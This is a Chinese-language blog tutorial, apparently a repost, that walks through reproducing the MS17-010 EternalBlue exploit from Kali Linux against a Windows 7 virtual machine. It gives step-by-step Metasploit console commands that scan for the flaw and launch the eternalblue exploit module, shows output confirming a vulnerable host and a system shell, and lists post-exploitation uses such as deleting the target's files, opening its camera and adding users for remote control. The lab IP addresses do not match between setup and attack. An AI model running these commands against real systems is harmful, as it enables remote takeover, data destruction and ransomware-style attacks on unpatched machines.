网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)

网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)_第1张图片网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)_第2张图片

       WannaCry勒索病毒席卷全球,一旦中了WannaCry病毒电脑文件会被“加密劫持”,黑客要求受害者支付高昂赎金(比特币)才能拿到解密秘钥。 而这枚WannaCry勒索病毒,就是黑客拿着美国安全局泄露的永恒之蓝攻击代码进行研制,并进行大肆勒索传播。

MS17-010是Windows SMBv1服务中存在的远程代码执行漏洞;
   • 开启SMB服务( 445端口) 的的系统可被执行远程代码, 从而导致被远程控制;
   • 受影响系统: Windows XP、 Windows 7/8/10、 Server 2003/2008/2012/2016

只要用户打上MS17-010这个补丁,就可以避免这次攻击。

需准备环境:Kali-Linux、Windows 7 虚拟机

Kali-Linux :192.168.100.129

Windows 7: 192.168.100.131(确保处在同个网络下,能互相ping通)

网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)_第3张图片

第一步:

①输入命令“msfconsole” ,进入metasploit渗透测试框架

②输入命令“search ms17-010”,搜索ms17-010相关漏洞利用代码

网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)_第4张图片

网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)_第5张图片

       这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝渗透代码,前者先扫描,若显示有漏洞,再进行渗透。

第二步:

       使用相对应的命令行,使用ms17-010扫描模块对靶机Win7进行扫描,才能进行下一步的渗透操作。

msf5 > use 1   //使用ms17-010扫描模块,对靶机Win7进行扫描
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.86.132   //设置目标IP或网段
RHOST => 192.168.86.132
msf5 auxiliary(scanner/smb/smb_ms17_010) > run   //执行扫描

[+] 192.168.86.132:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)   //说明扫描到的这台win 7存在ms17-010漏洞
[*] 192.168.86.132:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > back

网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)_第6张图片

第三步: 

      使用ms17-010渗透模块对靶机Win7进行渗透

msf5 > use 2   //使用ms17-010渗透模块对靶机Win7进行渗透
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options  //查看可设置的选项
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.86.132
RHOST => 192.168.86.132   //设置渗透目标IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit   //执行渗透

网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)_第7张图片

网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)_第8张图片

       看到“C:\Windows\system32>”就说明拿到了Win7的Shell,漏洞攻击已经成功,接下来要做的就是后渗透攻击,之后便可以通过Shell对目标靶机进行控制,后渗透测试中会有很多好玩的指令操作,如打开摄像头,删除文件,删除目标主机目录,创建系统用户等等。

后渗透测试一: 删除靶机的文件

 后渗透测试二: 新建系统用户,远程控制靶机

网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)_第9张图片

 网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)_第10张图片

 网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)_第11张图片

 网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)_第12张图片

 

你可能感兴趣的:(web安全,linux,安全)